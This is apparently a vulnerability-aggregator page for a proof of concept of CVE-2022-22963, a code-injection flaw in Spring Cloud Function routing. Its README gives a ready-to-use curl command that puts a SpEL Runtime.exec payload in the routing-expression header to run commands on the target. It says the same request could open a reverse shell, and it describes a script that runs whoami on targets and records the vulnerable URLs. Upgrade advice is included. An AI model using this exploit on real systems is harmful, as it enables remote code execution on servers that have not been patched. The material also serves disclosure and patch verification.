CVE-2022-22963 PoC — Spring Framework 代码注入漏洞

Source

https://github.com/puckiestyle/CVE-2022-22963

Associated Vulnerability

Title:Spring Framework 代码注入漏洞 (CVE-2022-22963)
Description:In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

Readme

# CVE-2022-22963
CVE-2022-22963 PoC 

Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE/blob/main/Spel_RCE_POC.py . By default whoami is executed on the target and a file vulnerable.txt is created with the URLs that are vulnerable.

Exploiting the vulnerability is quite easy to accomplish. Here is reported the curl command to exploit the vulnerability.

curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\"touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'

With this curl it’s trivial to create a file on the operating system but it could be used to open a reverse shell on the vulnerable host or container.

If you’re impacted by CVE-2022-22963, you should update the application to the newest versions 3.1.7 & 3.2.3.

# More information at
https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html, 
https://github.com/spring-cloud/spring-cloud-function/commit/dc5128b80c6c04232a081458f637c81a64fa9b52

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →